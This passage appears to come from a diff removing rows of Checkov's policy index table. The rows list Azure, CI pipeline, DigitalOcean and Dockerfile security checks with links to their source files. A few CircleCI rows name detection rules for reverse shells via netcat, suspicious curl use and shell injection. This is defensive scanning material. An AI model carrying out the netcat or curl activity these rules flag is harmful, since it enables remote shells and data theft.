-| 2029 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) |
-| 2030 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) |
-| 2031 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) |
-| 2032 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) |
-| 2033 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) |
-| 2034 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) |
-| 2035 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) |
-| 2036 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) |
-| 2037 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) |
-| 2038 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks 
are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 2039 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 2040 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | -| 2041 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 2042 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 2043 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 2044 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | 
[PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 2045 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | -| 2046 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2047 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2048 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2049 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2050 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for 
Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2051 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2052 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 2053 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 2054 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | -| 2055 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | -| 2056 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly 
permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | -| 2057 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | -| 2058 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | -| 2059 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | -| 2060 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | -| 2061 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | -| 2062 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | 
[AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | -| 2063 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | -| 2064 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | -| 2065 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | -| 2066 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | -| 2067 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | -| 2068 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | 
[AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | -| 2069 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | -| 2070 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | -| 2071 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | -| 2072 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | -| 2073 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2074 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | 
[AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2075 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2076 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2077 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | -| 2078 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | -| 2079 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | -| 2080 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private 
endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | -| 2081 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | -| 2082 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | -| 2083 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 2084 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 2085 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | -| 2086 | CKV_AZUREPIPELINES_1 | azure_pipelines | jobs | Ensure container job uses a non latest version tag | Azure Pipelines | 
[ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | -| 2087 | CKV_AZUREPIPELINES_1 | azure_pipelines | stages[].jobs[] | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | -| 2088 | CKV_AZUREPIPELINES_2 | azure_pipelines | jobs | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | -| 2089 | CKV_AZUREPIPELINES_2 | azure_pipelines | stages[].jobs[] | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | -| 2090 | CKV_AZUREPIPELINES_3 | azure_pipelines | jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | -| 2091 | CKV_AZUREPIPELINES_3 | azure_pipelines | stages[].jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | -| 2092 | CKV_AZUREPIPELINES_5 | azure_pipelines | *.container[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2093 | CKV_AZUREPIPELINES_5 | azure_pipelines | jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 
2094 | CKV_AZUREPIPELINES_5 | azure_pipelines | stages[].jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2095 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | -| 2096 | CKV_BITBUCKET_1 | bitbucket_configuration | * | Merge requests should require at least 2 approvals | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py) | -| 2097 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | [{image:image,__startline__:__startline__,__endline__:__endline__}] | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2098 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2099 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2100 | CKV_CIRCLECIPIPELINES_1 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline 
image uses a non latest version tag | circleci_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py) | -| 2101 | CKV_CIRCLECIPIPELINES_2 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image version is referenced via hash not arbitrary tag. | circleci_pipelines | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py) | -| 2102 | CKV_CIRCLECIPIPELINES_3 | circleci_pipelines | orbs.{orbs: @} | Ensure mutable development orbs are not used. | circleci_pipelines | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py) | -| 2103 | CKV_CIRCLECIPIPELINES_4 | circleci_pipelines | orbs.{orbs: @} | Ensure unversioned volatile orbs are not used. | circleci_pipelines | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py) | -| 2104 | CKV_CIRCLECIPIPELINES_5 | circleci_pipelines | jobs.*.steps[] | Suspicious use of netcat with IP address | circleci_pipelines | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py) | -| 2105 | CKV_CIRCLECIPIPELINES_6 | circleci_pipelines | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | circleci_pipelines | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py) | -| 2106 | CKV_CIRCLECIPIPELINES_7 | circleci_pipelines | jobs.*.steps[] | Suspicious use of curl in run task | circleci_pipelines | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py) | -| 2107 | CKV_CIRCLECIPIPELINES_8 | 
circleci_pipelines | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | -| 2108 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | -| 2109 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | -| 2110 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | -| 2111 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | -| 2112 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | -| 2113 | CKV_DOCKER_1 | dockerfile | EXPOSE | Ensure port 22 is not exposed | dockerfile | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py) | -| 2114 | CKV_DOCKER_2 | dockerfile | * | Ensure that HEALTHCHECK instructions 
have been added to container images | dockerfile | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py) | -| 2115 | CKV_DOCKER_3 | dockerfile | * | Ensure that a user for the container has been created | dockerfile | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py) | -| 2116 | CKV_DOCKER_4 | dockerfile | ADD | Ensure that COPY is used instead of ADD in Dockerfiles | dockerfile | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py) | -| 2117 | CKV_DOCKER_5 | dockerfile | RUN | Ensure update instructions are not use alone in the Dockerfile | dockerfile | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py) | -| 2118 | CKV_DOCKER_6 | dockerfile | MAINTAINER | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated) | dockerfile | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py) | -| 2119 | CKV_DOCKER_7 | dockerfile | FROM | Ensure the base image uses a non latest version tag | dockerfile | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py) | -| 2120 | CKV_DOCKER_8 | dockerfile | USER | Ensure the last USER is not root | dockerfile | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py) | -| 2121 | CKV_DOCKER_9 | dockerfile | RUN | Ensure that APT isn't used | dockerfile | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py) | -| 2122 | CKV_DOCKER_10 | dockerfile | WORKDIR | Ensure that WORKDIR values are absolute paths | dockerfile | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py) | -| 2123 | 
CKV_DOCKER_11 | dockerfile | FROM | Ensure From Alias are unique for multistage builds. | dockerfile | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py) | -| 2124 | CKV2_DOCKER_1 | resource | RUN | Ensure that sudo isn't used | dockerfile | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml) | -| 2125 | CKV2_DOCKER_2 | resource | RUN | Ensure that certificate validation isn't disabled with curl | dockerfile | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml) | -| 2126 | CKV2_DOCKER_3 | resource | RUN | Ensure that certificate validation isn't disabled with wget | dockerfile | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml) | -| 2127 | CKV2_DOCKER_4 | resource | RUN | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option | dockerfile | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml) | -| 2128 | CKV2_DOCKER_5 | resource | ARG | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | -| 2129 | CKV2_DOCKER_5 | resource | ENV | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | -| 2130 | CKV2_DOCKER_5 | resource | RUN | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | 
